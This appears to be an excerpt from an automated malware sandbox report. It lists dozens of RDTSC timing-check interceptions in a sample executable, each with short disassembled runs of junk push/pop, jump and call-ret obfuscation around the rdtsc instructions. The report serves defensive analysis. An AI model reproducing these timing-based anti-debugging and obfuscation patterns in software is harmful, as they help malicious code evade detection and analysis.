                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE49 second address: B3FE5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3D0F68BB1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE5F second address: B3FE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF3D0D81736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE6B second address: B3FE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FF3D0F68BBEh 0x0000000f jmp 00007FF3D0F68BB2h 0x00000014 jnp 00007FF3D0F68BA6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE92 second address: B3FE9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FF3D0D81736h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B403EB second address: B40411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FF3D0F68BB0h 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007FF3D0F68BA6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B40411 second address: B40415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B40807 second address: B40811 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF3D0F68BACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B409A0 second address: B409A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B409A6 second address: B409B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FF3D0F68BA6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B40B9A second address: B40BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FF3D0D81736h 0x0000000c je 00007FF3D0D81736h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B40EA6 second address: B40EB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3D0F68BACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0F8E4 second address: AEB420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, cx 0x0000000f lea eax, dword ptr [ebp+1248A63Dh] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FF3D0D81738h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f add edx, dword ptr [ebp+122D360Bh] 0x00000035 nop 0x00000036 jmp 00007FF3D0D81740h 0x0000003b push eax 0x0000003c pushad 0x0000003d jmp 00007FF3D0D8173Fh 0x00000042 pushad 0x00000043 jmp 00007FF3D0D8173Bh 0x00000048 js 00007FF3D0D81736h 0x0000004e popad 0x0000004f popad 0x00000050 nop 0x00000051 pushad 0x00000052 mov dword ptr [ebp+122D358Ch], edx 0x00000058 mov ax, bx 0x0000005b popad 0x0000005c call dword ptr [ebp+122D25A8h] 0x00000062 pushad 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 pop edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FF3D0D8173Eh 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0FF16 second address: B0FF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007FF3D0F68BB2h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0FF38 second address: B0FF59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF3D0D81746h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0FF59 second address: B0FF5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10778 second address: B1077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1077C second address: B10782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10782 second address: B107A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jng 00007FF3D0D81736h 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B108D6 second address: B108DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B108DC second address: B108E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10B55 second address: B10B9D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF3D0F68BAAh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FF3D0F68BA8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dx, si 0x00000030 lea eax, dword ptr [ebp+1248A681h] 0x00000036 clc 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10B9D second address: B10BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D8173Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10BAD second address: B10BFD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF3D0F68BA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007FF3D0F68BB2h 0x00000011 js 00007FF3D0F68BACh 0x00000017 jns 00007FF3D0F68BA6h 0x0000001d nop 0x0000001e cld 0x0000001f lea eax, dword ptr [ebp+1248A63Dh] 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007FF3D0F68BA8h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f nop 0x00000040 push eax 0x00000041 push edx 0x00000042 push ecx 0x00000043 jg 00007FF3D0F68BA6h 0x00000049 pop ecx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10BFD second address: B10C16 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF3D0D81738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007FF3D0D81736h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10C16 second address: B10C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10C1C second address: AEBED1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF3D0D81736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FF3D0D81738h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1F95h], ecx 0x0000002d mov dx, A74Ah 0x00000031 call dword ptr [ebp+122D1B42h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF3D0D81741h 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AEBED1 second address: AEBEE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007FF3D0F68BA6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B448B1 second address: B448B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44A0C second address: B44A22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF3D0F68BB0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44A22 second address: B44A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44A27 second address: B44A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF3D0F68BA6h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FF3D0F68BAAh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF3D0F68BABh 0x0000001a js 00007FF3D0F68BA6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44B64 second address: B44B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44CC6 second address: B44CE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44CE7 second address: B44CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44E42 second address: B44E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A116 second address: B4A11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A735 second address: B4A739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A739 second address: B4A73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A73F second address: B4A781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FF3D0F68BA6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FF3D0F68BB9h 0x00000014 jmp 00007FF3D0F68BB5h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A781 second address: B4A785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A785 second address: B4A789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4ABE9 second address: B4ABF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4ABF3 second address: B4AC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF3D0F68BAAh 0x0000000a pushad 0x0000000b js 00007FF3D0F68BA6h 0x00000011 jmp 00007FF3D0F68BB2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4AD45 second address: B4AD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4AD4B second address: B4AD4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4AD4F second address: B4AD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4B1CD second address: B4B1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4FD95 second address: B4FDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5494C second address: B54963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0F68BB2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B54661 second address: B54673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 je 00007FF3D0D81744h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B54673 second address: B54677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B56F0B second address: B56F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3D0D81740h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jo 00007FF3D0D81736h 0x00000010 popad 0x00000011 jng 00007FF3D0D8173Ah 0x00000017 push edx 0x00000018 pop edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push ecx 0x0000001e pushad 0x0000001f jmp 00007FF3D0D8173Eh 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5725A second address: B5727F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF3D0F68BB9h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5727F second address: B57283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B573FA second address: B573FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5A777 second address: B5A78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FF3D0D8173Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5A78F second address: B5A793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5A793 second address: B5A799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5AA6C second address: B5AA8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF3D0F68BACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF3D0F68BAAh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5AA8F second address: B5AA93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5AA93 second address: B5AA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5AD4A second address: B5AD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0D81747h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AC7509 second address: AC7526 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F01F second address: B5F023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F2E7 second address: B5F2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0F68BABh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F2F6 second address: B5F309 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF3D0D8173Eh 0x00000008 jnc 00007FF3D0D81736h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F5D8 second address: B5F5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10543 second address: B10547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10547 second address: B105D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 call 00007FF3D0F68BB8h 0x0000000d pushad 0x0000000e mov eax, 3D133BD3h 0x00000013 mov eax, esi 0x00000015 popad 0x00000016 pop edx 0x00000017 mov ebx, dword ptr [ebp+1248A67Ch] 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FF3D0F68BA8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov dword ptr [ebp+122D2906h], ebx 0x0000003d mov dword ptr [ebp+122D2906h], esi 0x00000043 add eax, ebx 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007FF3D0F68BA8h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 00000015h 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f mov ch, 23h 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 je 00007FF3D0F68BACh 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B105D1 second address: B105D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B105D5 second address: B10604 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FF3D0F68BB3h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF3D0F68BB2h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F71C second address: B5F720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F720 second address: B5F726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F726 second address: B5F72D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F72D second address: B5F764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0F68BB6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FF3D0F68BAFh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5F764 second address: B5F772 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF3D0D81754h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B603BE second address: B603C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B64184 second address: B6418A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B63D10 second address: B63D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF3D0F68BA6h 0x0000000d jc 00007FF3D0F68BA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B6BEB1 second address: B6BEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF3D0D81736h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B69E01 second address: B69E2B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF3D0F68BB4h 0x00000008 push ebx 0x00000009 jmp 00007FF3D0F68BB1h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
